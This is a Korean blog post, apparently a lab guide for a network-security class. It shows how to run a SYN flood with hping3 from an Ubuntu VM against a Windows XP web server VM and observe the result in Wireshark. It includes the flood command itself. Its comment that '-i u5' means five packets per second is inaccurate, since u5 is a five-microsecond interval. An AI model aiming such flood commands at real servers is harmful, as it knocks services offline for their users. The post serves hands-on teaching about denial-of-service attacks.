본문 바로가기
study

[Network] SynFlood 실습 VM 사용

by pwnhub 2024. 5. 5.

윈도우 XP를 준비하고 윈도우 XP 내부에 APM7과 wireshark 32bit 1.10.x 버전을 설치해준다.

이 과정이 어려우니까 아래 주소를 활용한다.

http://git.zeropointer.co.kr/gap_dev/share/

 

lee_dongha / share · GitLab

GitLab Community Edition

git.zeropointer.co.kr

 

https://pwnhub.kr/36

 

[Network] SynFlood 실습 VM 이용 시 주의사항

SYN Flood 실습을 VM으로 진행하는 것은 어렵지 않다.하지만 windows xp 이용으로 인해 발생하는 오류로, 다수의 학생이 실습 진행을 실패하여 아래 내용을 정리하였다.*vmware가 xp를 자동으로 인식하여

pwnhub.kr

참고하면 된다.

공격자는 ubuntu22.04 이미지에 net-tools, hping3를 설치하면 된다.

 

들어가기 앞서, 윈도우에서는 cmd 열고 ipconfig

우분투에서는 terminal 열고 ifconfig 를 진행하여 서로의 ip를 확인해 준다.

 

  1. 윈도우에서 wireshark를 켜고 start 를 눌러준다
  2. 우분투에서 terminal 을 연다
    혹시 모를까봐 : 왼쪽 하단 점 9개 버튼 -> terminal 검색 -> 클릭
  3. 우분투(공격자)에서 피해자(윈도우 웹 서버)로 ping 날려보고 윈도우에서 wireshark 관측하기
ping [피해자 IP]

   4. 우분투(공격자)에서 피해자(윈도우 웹 서버)로 syn packet 날려보고 윈도우에서 wireshark 관측하기

sudo hping3 -S -p 80 [피해자 IP]

   5. syn flood 공격 날려보고 웹 서버 생존 여부 확인하기 + 윈도우에서 wireshark 관측

sudo hping3 -S -i u5 -p 80 [피해자 IP]
# 초당 5개 TCP SYN 패킷을 보내는 명령어, 5 정도가 보호기법 실습에 적합함 ( 서버 리소스를 아낍시다 )

   6. 웹사이트가 down되는 것을 확인 한 후 wireshark가 많이 느려지면 ctrl + C 로 공격 중단

    wireshark사용법은 추가로 다루지 않음 ( ip.addr == [검색할 아이피] 등의 문법은 교재 참고)

 

참고문헌

https://www.cloudflare.com/ko-kr/learning/ddos/syn-flood-ddos-attack/